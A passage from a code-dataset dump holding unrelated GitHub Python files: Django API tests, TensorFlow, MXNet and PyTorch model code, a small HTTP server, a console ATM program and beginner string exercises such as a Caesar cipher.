0.01)\n","repo_name":"chrisdonahue/sheetsage","sub_path":"sheetsage/representations/jukebox_test.py","file_name":"jukebox_test.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"66"} +{"seq_id":"2470629415","text":"import os\nimport django\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"adwile.settings\")\ndjango.setup()\n\nfrom django.test import TestCase\n\nfrom rest_framework.test import APIClient\n\nfrom teaser.models import Teaser\nfrom user.models import User\n\n\nclass TestCaseTeaser(TestCase):\n\n author_username = 'test'\n admin_username = 'admin'\n teaser_title = 'teaser'\n url = 'http://127.0.0.1:8000/api/teaser_status/'\n\n def setUp(self):\n self.client = APIClient()\n\n user = User.objects.create(username=self.author_username)\n Teaser.objects.create(title=self.teaser_title, description='test', category=Teaser.Category.CATEGORY_1, author=user)\n\n def test_author_change_teaser_status(self):\n \"\"\"Смена статуса тизера автором\"\"\"\n\n user = User.objects.get(username=self.author_username)\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.PAID}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n self.assertEqual(response.status_code, 403)\n self.assertEqual(response.data['detail'], 'You do not have permission to perform this action.')\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.UNKNOWN)\n\n def test_admin_change_teaser_status_paid(self):\n \"\"\"Смена статуса тизера админом на PAID\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.PAID}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n 
self.assertEqual(teaser.status_paid, Teaser.StatusPaid.PAID)\n self.assertEqual(response.data['status'], 'OK')\n self.assertEqual(response.data['teaser_data'][0]['id'], teaser.id)\n\n def test_admin_change_teaser_status_reject(self):\n \"\"\"Смена статуса тизера админом на REJECT\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.REJECT}\n self.client.force_authenticate(user)\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.REJECT)\n self.assertEqual(response.data['status'], 'OK')\n self.assertEqual(response.data['teaser_data'][0]['id'], teaser.id)\n\n def test_admin_change_paid_teaser_status(self):\n \"\"\"Смена статуса тизера админом на REJECT, когда статус тизера уже установлен\"\"\"\n\n user = User.objects.first()\n teaser = Teaser.objects.get(title=self.teaser_title)\n\n data = {\"teaser_ids\": [teaser.id], \"status_paid\": Teaser.StatusPaid.REJECT}\n self.client.force_authenticate(user)\n self.client.put(path=self.url, data=data)\n data['status_paid'] = Teaser.StatusPaid.PAID\n response = self.client.put(path=self.url, data=data)\n\n teaser.refresh_from_db()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(teaser.status_paid, Teaser.StatusPaid.REJECT)\n\n","repo_name":"DenNavin/adwile","sub_path":"teaser/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69914054292","text":"# This is a tutorial using TensorFlow 2.x, in particular, low-level TF APIs without high-level Keras\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport os\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\n\nDATA_PATH = './data/datasets-promise12'\nRESULT_PATH = './result' \n\n### Define a few functions for network layers\ndef conv3d(input, filters, downsample=False, activation=True, batch_norm=False):\n if downsample: strides = [1,2,2,2,1]\n else: strides = [1,1,1,1,1]\n y = tf.nn.conv3d(input, filters, strides=strides, padding='SAME')\n if batch_norm: y = batch_norm(y)\n if activation: y = tf.nn.relu(y)\n return y # where bn can be added\n\ndef resnet_block(input, filters, batch_norm=False):\n y = conv3d(input, filters[..., 0])\n y = conv3d(y, filters[..., 1], activation=False) + input\n if batch_norm: y = batch_norm(y)\n return tf.nn.relu(y) # where bn can be added\n\ndef downsample_maxpool(input, filters):\n y = conv3d(input, filters)\n return tf.nn.max_pool3d(y, ksize=[1,3,3,3,1], padding='SAME', strides=[1,2,2,2,1])\n\ndef deconv3d(input, filters, out_shape, batch_norm=False):\n y = tf.nn.conv3d_transpose(input, filters, output_shape=out_shape, strides=[1,2,2,2,1], padding='SAME') \n if batch_norm: y = batch_norm(y)\n return tf.nn.relu(y) # where bn can be added\n\ndef batch_norm(inputs, is_training, decay = 0.999):\n # This is where to insert the implementation of batch normalisaiton\n return inputs\n\ndef add_variable(var_shape, var_list, var_name=None, initialiser=None):\n if initialiser is None:\n initialiser = tf.initializers.glorot_normal()\n if var_name is None:\n var_name = 'var{}'.format(len(var_list))\n var_list.append(tf.Variable(initialiser(var_shape), name=var_name, trainable=True))\n return var_list\n\n### Define a model (the 3D U-Net) with residual layers\n### ref: 
https://arxiv.org/abs/1512.03385 & https://arxiv.org/abs/1505.04597\n## define all the trinable weights\nnum_channels = 32\nnc = [num_channels*(2**i) for i in range(4)]\nvar_list=[]\n# intial-layer\nvar_list = add_variable([5,5,5,1,nc[0]], var_list)\n# encoder-s0\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0]], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[1]], var_list)\n# encoder-s1\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1]], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[2]], var_list)\n# encoder-s2\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2]], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[3]], var_list)\n# deep-layers-s3\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\nvar_list = add_variable([3,3,3,nc[3],nc[3],2], var_list)\n# decoder-s2\nvar_list = add_variable([3,3,3,nc[2],nc[3]], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\nvar_list = add_variable([3,3,3,nc[2],nc[2],2], var_list)\n# decoder-s1\nvar_list = add_variable([3,3,3,nc[1],nc[2]], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\nvar_list = add_variable([3,3,3,nc[1],nc[1],2], var_list)\n# decoder-s0\nvar_list = add_variable([3,3,3,nc[0],nc[1]], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\nvar_list = add_variable([3,3,3,nc[0],nc[0],2], var_list)\n# output-layer\nvar_list = add_variable([3,3,3,nc[0],1], var_list)\n\n## model with corresponding layers\n@tf.function\ndef residual_unet(input):\n # initial-layer\n skip_layers = []\n layer = conv3d(input, var_list[0])\n # encoder-s0\n layer = resnet_block(layer, var_list[1])\n layer = resnet_block(layer, var_list[2])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, var_list[3])\n layer = conv3d(layer, var_list[4])\n # encoder-s1\n layer = resnet_block(layer, var_list[5])\n layer = resnet_block(layer, var_list[6])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, var_list[7])\n layer = conv3d(layer, var_list[8])\n # encoder-s2\n layer = resnet_block(layer, var_list[9])\n layer = resnet_block(layer, var_list[10])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, var_list[11])\n layer = conv3d(layer, var_list[12])\n # deep-layers-s3\n layer = resnet_block(layer, var_list[13])\n layer = resnet_block(layer, var_list[14])\n layer = resnet_block(layer, var_list[15])\n # decoder-s2\n layer = deconv3d(layer, var_list[16], skip_layers[2].shape) + skip_layers[2]\n layer = resnet_block(layer, var_list[17])\n layer = resnet_block(layer, var_list[18])\n # decoder-s1\n layer = deconv3d(layer, var_list[19], skip_layers[1].shape) + skip_layers[1]\n layer = resnet_block(layer, var_list[20])\n layer = resnet_block(layer, var_list[21])\n # decoder-s0\n layer = deconv3d(layer, var_list[22], skip_layers[0].shape) + skip_layers[0]\n layer = resnet_block(layer, var_list[23])\n layer = resnet_block(layer, var_list[24])\n # output-layer\n layer = tf.sigmoid(conv3d(layer, var_list[25], activation=False))\n return layer\n\n\ndef loss_crossentropy(pred, target):\n return tf.losses.BinaryCrossentropy(pred=pred, target=target)\n\ndef loss_dice(pred, target, eps=1e-6):\n 
dice_numerator = 2 * tf.reduce_sum(pred*target, axis=[1,2,3,4])\n dice_denominator = eps + tf.reduce_sum(pred, axis=[1,2,3,4]) + tf.reduce_sum(target, axis=[1,2,3,4])\n return 1 - tf.reduce_mean(dice_numerator/dice_denominator)\n\n\n### a simple npy image reading class\nclass DataReader:\n def __init__(self, folder_name):\n self.folder_name = folder_name\n def load_images_train(self, indices_mb):\n return self.load_npy_files([\"image_train%02d.npy\" % idx for idx in indices_mb])\n def load_images_test(self, indices_mb):\n return self.load_npy_files([\"image_test%02d.npy\" % idx for idx in indices_mb])\n def load_labels_train(self, indices_mb):\n return self.load_npy_files([\"label_train%02d.npy\" % idx for idx in indices_mb])\n def load_npy_files(self, file_names):\n images = [np.float32(np.load(os.path.join(self.folder_name, fn))) for fn in file_names]\n return np.expand_dims(np.stack(images, axis=0), axis=4)\n\n\n### training\n@tf.function\ndef train_step(model, weights, optimizer, x, y):\n with tf.GradientTape() as tape:\n # g_tape.watched(var_list): trainable variables are automatically \"watched\".\n loss = loss_dice(model(x), y)\n gradients = tape.gradient(loss, weights)\n optimizer.apply_gradients(zip(gradients, weights))\n return loss\nlearning_rate = 1e-5\ntotal_iter = int(1e6)\nn = 50 # 50 training image-label pairs\nsize_minibatch = 4\n\nnum_minibatch = int(n/size_minibatch) # how many minibatches in each epoch\nindices_train = [i for i in range(n)]\n\nDataFeeder = DataReader(DATA_PATH)\noptimizer = tf.optimizers.Adam(learning_rate)\nfor step in range(total_iter):\n\n # shuffle data every time start a new set of minibatches\n if step in range(0, total_iter, num_minibatch):\n random.shuffle(indices_train)\n\n # find out data indices for a minibatch\n minibatch_idx = step % num_minibatch # minibatch index\n indices_mb = indices_train[minibatch_idx*size_minibatch:(minibatch_idx+1)*size_minibatch]\n # halve image size so this can be reasonably tested, e.g. 
on a CPU\n input_mb = DataFeeder.load_images_train(indices_mb)[:, ::2, ::2, ::2, :]\n label_mb = DataFeeder.load_labels_train(indices_mb)[:, ::2, ::2, ::2, :]\n # update the variables\n loss_train = train_step(residual_unet, var_list, optimizer, input_mb, label_mb)\n\n # print training information\n if (step % 100) == 0:\n tf.print('Step', step, ': training-loss=', loss_train)\n\n # --- simple tests during training ---\n if (step % 1000) == 0:\n indices_test = [random.randrange(30) for i in range(size_minibatch)] # select size_minibatch test data\n input_test = DataFeeder.load_images_test(indices_test)[:, ::2, ::2, ::2, :]\n pred_test = residual_unet(input_test)\n # save the segmentation\n for idx in range(size_minibatch):\n np.save(os.path.join(RESULT_PATH, \"label_test%02d_step%06d.npy\" % (indices_test[idx], step)), pred_test[idx, ...])\n tf.print('Test results saved.')\n","repo_name":"kkl116/MedICSS-2020","sub_path":"segmentation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1200960182","text":"import torch\nimport torch.nn as nn\n\nclass IntrinsicCuriosity(nn.Module):\n def __init__(self,action_dim,state_dim,feature_dim):\n super(IntrinsicCuriosity,self).__init__()\n\n\n self.feature_model = nn.Sequential(\n nn.Linear(state_dim,feature_dim),\n )\n\n self.forward_model = nn.Sequential(\n nn.Linear(feature_dim+action_dim,feature_dim)\n )\n\n self.inverse_model = nn.Sequential(\n nn.Linear(feature_dim,action_dim),\n )\n \n def forward(self,state,next_state,action):\n state_ft = self.feature_model(state)\n next_state_ft = self.feature_model(next_state)\n \n inv_inp = torch.cat((state_ft,next_state_ft),1)\n for_inp = torch.cat((state_ft,action),1)\n\n inv_op = self.inverse_model(inv_inp)\n for_op = self.forward_model(for_inp)\n\n return inv_op,for_op\n\n\nicm = IntrinsicCuriosity()\nstate = torch.rand(75)\nnext_state = torch.rand(75)\n","repo_name":"Manjunatha-b/FirstPersonShooterAI","sub_path":"MLFiles/curiosity.py","file_name":"curiosity.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73522050770","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\n\nhostName = \"\"\nserverPort = 8080\n\nclass MyServer(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n html = '''\n \n \n
Welcome to my Raspberry Pi
\n \n \n '''\n self.wfile.write(html.encode(\"utf-8\"))\n\n### Main ###\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n","repo_name":"dschier-wtd/presentations","sub_path":"20220801-slub-smart-devices-2/examples/web_1.py","file_name":"web_1.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"38758950076","text":"#!/usr/bin/env python3\n\nimport pygame\nfrom pygame.locals import DOUBLEBUF\n\nclass Display(object):\n def __init__(self, W, H):\n pygame.init()\n self.screen = pygame.display.set_mode((W, H), DOUBLEBUF)\n self.surface = pygame.Surface(self.screen.get_size()).convert()\n print(self.surface)\n\n def paint(self, img):\n pygame.surfarray.blit_array(self.surface, img.swapaxes(0,1)[:, :, [2,1,0]]) # BGR > RGB\n self.screen.blit(self.surface, (0,0))\n pygame.display.flip()","repo_name":"epochlab/SfM","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"570085379","text":"from nltk.tree import *\n\nclass Permutator:\n results = set() \n nps = []\n maxResults = 0\n def __init__(self, source, limit) -> None:\n self.tree = ParentedTree.fromstring(source)\n self.maxResults = limit\n\n #Collect array of arrays with all children NPs and their parent just in case for future\n def traverse(self, root):\n if len(root) == 0:\n return\n level = []\n for node in root:\n if type(node) == ParentedTree:\n if node.label() == \"NP\":\n level.append(node.treeposition()) \n self.traverse(node)\n if len(level) > 1:\n self.nps.append(level)\n\n #Helper function to swap two nodes on a tree\n def swap_nodes(self, node1, node2):\n #Have to use temp trees to avoid \"Can not insert a subtree that already has a parent.\" value error\n temp1 = self.tree[node1].copy(deep=True)\n temp2 = self.tree[node2].copy(deep=True)\n self.tree[node1] = temp2\n self.tree[node2] = temp1\n\n #Recursive backtracking algorithm to find permutations in a group of NPs \n def permutateNPs(self, group, start, end, subgroup=None):\n if len(self.results) >= self.limit:\n return\n if start == end:\n if subgroup:\n self.permutateNPs(subgroup, 0, len(subgroup))\n \n self.results.add(self.tree._pformat_flat(\"\", \"()\", False))\n else:\n for i in range(start, end):\n first = group[i]\n second = group[start]\n if first != second:\n self.swap_nodes(first, second)\n first, second = second, first \n self.permutateNPs(group, start+1, end, subgroup=subgroup)\n if first != second:\n self.swap_nodes(first, second)\n first, second = second, first\n \n #Return a set of all possible permutations of separate permutations\n def permutate_tree(self):\n self.traverse(self.tree)\n for i,group in enumerate(self.nps):\n for j in range(i+1,len(self.nps)):\n group2 = self.nps[j]\n self.permutateNPs(group, 0, len(group), subgroup=group2)\n \n def seralize_permutations(self):\n return([{\"tree\": x} for x in self.results])\n","repo_name":"Dagonite6/SyntaxTreePermutations","sub_path":"permutator.py","file_name":"permutator.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"73327708691","text":"import math\n\n\n#--SPLIT--\n# -class Solution:\n# @param A : tuple of integers\n# @return a list of integers\n# -\tdef repeatedNumber(self, A):\n\n\n#--SPLIT--\nclass Solution:\n\t# @param A : tuple of integers\n\t# @return a list of integers\n\tdef repeatedNumber(self, A):\n\t\treturn A\n\n\n#--SPLIT--\n\nif __name__ == \"__main__\":\n\ttest_cases = int(raw_input())\n\tfor i in range(test_cases):\n\t\tA = [int(l) for l in raw_input().split(\" \")][1:]\n\t\tsolution = Solution()\n\t\tresult = solution.repeatedNumber(A)\n\t\tprint(\"{0} {1} \".format(result[0], result[1]))\n","repo_name":"hacktheinterview/hacktheinterview","sub_path":"problems/97/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34453909111","text":"import random\r\nimport sys\r\n\r\nclass ATM():\r\n def __init__(self, nama, nomor_akun, saldo = 0):\r\n self.nama = nama\r\n self.nomor_akun = nomor_akun\r\n self.saldo = saldo\r\n\r\n def detail_akun (self):\r\n print(\"\\n----------DETAIL AKUN----------\")\r\n print(f\"Pemilik Akun : {self.nama}\")\r\n print(f\"Nomor Akun : {self.nomor_akun}\")\r\n print(f\"Saldo yang Tersedia : Rp.{self.saldo}\\n\")\r\n\r\n def setor(self, jumlah):\r\n self.jumlah = jumlah\r\n self.saldo = self.saldo + self.jumlah\r\n print(\"Saldo rekening saat ini: Rp.\", self.saldo)\r\n print()\r\n \r\n def menarik(self, jumlah):\r\n self.jumlah = jumlah\r\n if self.jumlah > self.saldo:\r\n print(\"Saldo Anda tidak Cukup!\")\r\n print(f\"Saldo Anda hanya Rp.{self.saldo}\")\r\n print(\"Coba dengan jumlah yang lebih rendah dari saldo.\")\r\n print()\r\n else :\r\n self.saldo = self.saldo - self.jumlah\r\n print(f\"Rp.{jumlah} Penarikan Berhasil!\")\r\n print(\"Saldo rekening saat ini: Rp.\", self.saldo)\r\n print()\r\n \r\n def check_saldo(self):\r\n print(\"Saldo yang Tersedia : Rp.\", self.saldo)\r\n print()\r\n\r\n def transaksi(self):\r\n print(\"\"\"\r\n TRANSAKSI\r\n *********************\r\n Menu:\r\n 1. Detail Akun \r\n 2. Check Saldo\r\n 3. Setor\r\n 4. Menarik\r\n 5. Exit\r\n *********************\r\n \"\"\")\r\n\r\n while True:\r\n try:\r\n pilih = int(input(\"Maukkan angka 1, 2, 3, 4 atau 5: \"))\r\n except:\r\n print(\"Error: Masukkan angka 1, 2, 3, 4, atau 5 saja!\\n\")\r\n continue\r\n else:\r\n if pilih == 1:\r\n atm.detail_akun()\r\n elif pilih == 2:\r\n atm.check_saldo()\r\n elif pilih == 3:\r\n jumlah = int(input(\"Berapa banyak yang ingin Anda Setrorkan(Rp.): \"))\r\n atm.setor(jumlah)\r\n elif pilih == 4:\r\n jumlah = int(input(\"Berapa banyak yang ingin Anda tarik (Rp.): \"))\r\n atm.menarik(jumlah)\r\n elif pilih == 5:\r\n print(f\"\"\"\r\n Tanda Penerima..............\r\n ****************************************\r\n Transaksi Selesai. \r\n Nomor Transaksi: {random.randint(10000, 1000000)} \r\n Pemilik Akun : {self.nama} \r\n Nomor Akun : {self.nomor_akun} \r\n Saldo yang Tersedia: Rp.{self.saldo} \r\n \r\n Terima kasih telah memilih kami sebagai bank Anda \r\n *********************************************************\r\n \"\"\")\r\n sys.exit()\r\n \r\n \r\nprint(\"*******SELAMAT DATANG DI BANK INDONESIA*******\")\r\nprint(\"___________________________________________________________\\n\")\r\nprint(\"----------------PEMBUATAN AKUN---------------\")\r\nnama = input(\"Masukkan nama Anda : \")\r\nnomor_akun = input(\"Masukkan nomor akun Anda : \")\r\nprint(\"Selamat! 
Akun Anda berhasil dibuat......\\n\")\r\n \r\natm = ATM(nama, nomor_akun)\r\n \r\nwhile True:\r\n trans = input(\"Apakah anda ingin melakukan Transaksi?(y/n): \")\r\n if trans == \"y\":\r\n atm.transaksi()\r\n elif trans == \"n\":\r\n print(\"\"\"\r\n ----------------------------------------------------\r\n | Terima kasih telah memilih kami sebagai bank Anda |\r\n | Kunjungi kami lagi! |\r\n ----------------------------------------------------\r\n \"\"\")\r\n break\r\n else:\r\n print(\"Perintah yang Anda masukkan salah! Masukkan 'y' untuk Ya dan 'n' untuk Tidak.\\n\")\r\n","repo_name":"Fitriani-26/OOP","sub_path":"ATM (FITRIANI).py","file_name":"ATM (FITRIANI).py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43245706049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nfrom scipy import stats\n\nimport unittest\n\nfrom tests.distributions import utils\n\nimport oneflow.experimental as flow\nfrom zhusuan_of.distributions.normal import *\n\nflow.enable_eager_execution()\n\n# TODO: test sample value\nclass TestNormal(unittest.TestCase):\n def setUp(self): \n self._Normal_std = lambda mean, std, **kwargs: Normal(\n mean=mean, std=std, **kwargs)\n self._Normal_logstd = lambda mean, logstd, **kwargs: Normal(\n mean=mean, logstd=logstd, **kwargs)\n\n def test_init(self):\n try:\n Normal(mean=flow.ones((2, 1)),\n std=flow.zeros((2, 4, 3)), logstd=flow.zeros((2, 2, 3)))\n except:\n raise ValueError(\"Either.*should be passed\")\n\n try:\n Normal(mean=flow.ones((2, 1)), logstd=flow.zeros((2, 4, 3)))\n except:\n raise ValueError(\"should be broadcastable to match\")\n\n try:\n Normal(mean=flow.ones((2, 1)), std=flow.ones((2, 4, 3)))\n except:\n raise ValueError(\"should be broadcastable to match\")\n Normal(mean=flow.ones((32, 1), dtype=flow.float32),\n logstd=flow.ones((32, 1, 3), dtype=flow.float32))\n Normal(mean=flow.ones((32, 1), dtype=flow.float32),\n std=flow.ones((32, 1, 3), dtype=flow.float32) )\n\n def test_sample_shape(self):\n utils.test_2parameter_sample_shape_same(\n self, self._Normal_std, np.zeros, np.ones)\n utils.test_2parameter_sample_shape_same(\n self, self._Normal_logstd, np.zeros, np.zeros)\n\n def test_sample_reparameterized(self):\n mean = flow.ones((2, 3), requires_grad=True)\n logstd = flow.ones((2, 3), requires_grad=True)\n norm_rep = Normal(mean=mean, logstd=logstd)\n samples = norm_rep.sample()\n mean_grads, logstd_grads = flow.autograd.grad(\n outputs=[samples], inputs=[mean, logstd], out_grads=[flow.ones_like(samples)])\n\n self.assertTrue(mean_grads is not None)\n self.assertTrue(logstd_grads is not None)\n\n def test_log_prob_shape(self):\n utils.test_2parameter_log_prob_shape_same(\n self, self._Normal_std, np.zeros, np.ones, np.zeros)\n utils.test_2parameter_log_prob_shape_same(\n self, self._Normal_logstd, np.zeros, np.zeros, np.zeros)\n \n\n def test_value(self):\n def _test_value(given, mean, logstd):\n mean = np.array(mean, np.float32)\n given = np.array(given, np.float32)\n logstd = np.array(logstd, np.float32)\n std = np.exp(logstd)\n target_log_p = np.array(stats.norm.logpdf(given, mean, np.exp(logstd)), np.float32)\n\n mean = flow.Tensor(mean)\n logstd = flow.Tensor(logstd)\n std = flow.Tensor(std)\n given = flow.Tensor(given)\n norm1 = Normal(mean=mean, logstd=logstd)\n log_p1 = norm1.log_prob(given)\n 
np.testing.assert_allclose(log_p1.numpy(), target_log_p, rtol= 1e-03)\n\n norm2 = Normal(mean=mean, std=std)\n log_p2 = norm2.log_prob(given)\n np.testing.assert_allclose(log_p2.numpy(), target_log_p, rtol= 1e-03)\n\n _test_value([0.], [0.], [0.])\n _test_value([0.99, 0.9, 9., 99.], [1.], [-3., -1., 1., 10.])\n _test_value([7.], [0., 4.], [[1., 2.], [3., 5.]])\n\n def test_distribution_shape(self):\n param1 = flow.zeros((1))\n param2 = flow.ones((1))\n distribution = self._Normal_logstd(param1, param2)\n utils.test_and_save_distribution_img(distribution)","repo_name":"Oneflow-Inc/Zhusuan-Oneflow","sub_path":"tests/distributions/test_normal.py","file_name":"test_normal.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28811846481","text":"from argparse import ArgumentParser\n\nimport sys\n\nimport logging\n\nfrom processors.news_extraction_processor import NewsExtractionProcessor\nfrom utils.options import Options\nfrom data.news_sources import source\n\nlogging.basicConfig(\n level=logging.INFO,\n stream=sys.stdout,\n format='[%(asctime)s]: %(name)s : %(levelname)s : %(message)s'\n)\nlog = logging.getLogger(__name__)\n\n\ndef main(argv):\n options = parse_args(argv)\n log.info(\"options: \" + str(options))\n\n processor = NewsExtractionProcessor(options)\n processor.process()\n\n\ndef parse_args(argv):\n parser = ArgumentParser(prog=\"news-extraction\")\n parser.add_argument('--news_source', metavar='News source',\n type=source, required=True)\n parser.add_argument('--stock_news_path', metavar='Stock News Path',\n type=str, required=True)\n parser.add_argument('--output_file', metavar='Output File',\n type=str, required=True)\n\n return parser.parse_args(argv, namespace=Options())\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"vineetjohn/stock-news-corpora-analysis","sub_path":"stock_news_extractor.py","file_name":"stock_news_extractor.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17123939047","text":"from mxnet import gluon, init,autograd\nfrom mxnet.gluon import loss as gloss, nn ,data as gdata\n\n\n# 【生成数据】\n\ntrain_data = gdata.vision.FashionMNIST(train=True)\ntest_data = gdata.vision.FashionMNIST(train=False)\n\n# 【读取数据】\n\nbatch_size = 256\n\ntransformer = gdata.vision.transforms.ToTensor()\ntrain_iter = gdata.DataLoader(train_data.transform_first(transformer), batch_size, shuffle=True)\ntest_iter =gdata.DataLoader(test_data.transform_first(transformer), batch_size ,shuffle=False)\n\n# 【定义模型】\n\nnet = nn.Sequential()\nnet.add(nn.Dense(256, activation='relu'),nn.Dense(10))\n\n# 【初始化模型参数】\n\nnet.initialize(init.Normal(sigma=0.01))\n\n# 【定义损失函数】\n\nloss =gloss.SoftmaxCrossEntropyLoss()\n\n# 【定义优化算法】\ntrainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate':0.5})\n\n# 【训练模型】\n\nnum_epochs = 20\n\n# 定义归一化处理和计算准确率\ndef normal(y_hat, y):\n return (y_hat.argmax(axis=1) == y.astype('float32')).mean().asscalar()\n\ndef accuracy(data_iter,net):\n acc = 0\n for X, y in data_iter:\n acc += normal(net(X), y)\n return acc / len(data_iter)\n\nfor epoch in range(num_epochs):\n loss_sum = 0\n train_acc_sum = 0\n for X ,y in train_iter:\n with autograd.record():\n y_hat = net(X)\n l = loss(y_hat, y)\n l.backward()\n trainer.step(batch_size)\n loss_sum += l.mean().asscalar()\n train_acc_sum += normal(y_hat, y)\n test_acc = accuracy(test_iter, net)\n 
print('epoch %d loss %.3f train_loss %.3f test_acc %.3f' % (epoch,\n loss_sum/len(train_iter),\n train_acc_sum/len(train_iter),\n test_acc))\n\n\n","repo_name":"starship2018/deeplearning_mxnet","sub_path":"3-6-GluonToMultilayerPerceptron.py","file_name":"3-6-GluonToMultilayerPerceptron.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25716264492","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 11 11:00:27 2020\n\n@author: fiona\n\"\"\"\n\n# PBC 109-1 TA Lab 7 \n\n# Practice 1\n\"\"\"\n请定义一个函数 countCharacter(str_),接收一个字串参数。\n找出字串中重复出现最多次的字元,并印出其出现次数及其字元。\n重复出现最多次的字元只会有一个。\n若没有重复出现的字元,则印出 N。\n\"\"\"\ndef countCharacter(str_):\n char_list = []\n for char in str_: # 将字元加入一个list\n if char_list.count(char) == 0: # 没出现过才加\n char_list.append(char)\n \n # 记录最多次\n max_count = 0\n max_character = \"\"\n for character in char_list: # 找出现最多次的字元\n if str_.count(character) > max_count:\n max_count = str_.count(character)\n max_character = character\n if max_count == 1: # 最多次数是1即是没有重复\n print(\"N\")\n else:\n print(max_count, max_character, sep=\",\")\n\nprint(\"-Practice 1-\") \ncountCharacter(input(\"输入一字串,将会找出重复出现最多次的字元:\"))\n\n\n# Practice 2\n\"\"\"\n所谓凯萨密码,就是将原本的文字母对应到偏移过后的英文字母。\n举例而言,若偏移量为 3,则 A->D,B->E,X则对应回到 A。\n请定义一个函数caesar(str_, n),输入为一字串以及偏移量,输出为加密过后的字串。\nHint: ord() 和 chr()\n\"\"\"\ndef caesar(str_, n):\n result = \"\"\n for i in range(len(str_)):\n char = str_[i]\n if char.isupper():\n shift = (ord(char) + n - ord('A')) % 26 + ord('A')\n result += chr(shift)\n else:\n shift = (ord(char) + n - ord('a')) % 26 + ord('a')\n result += chr(shift)\n return result\n\nprint()\nprint(\"-Practice 2-\")\nprint(\"输入一字串以及偏移量,输出为加密过后的字串。\")\nstr_ = input(\"输入一字串(英文字母):\")\nn = int(input(\"输入偏移量(正整数):\"))\nprint(caesar(str_, n))\n\n\n# Practice 3\n\"\"\"\n定义一个函数 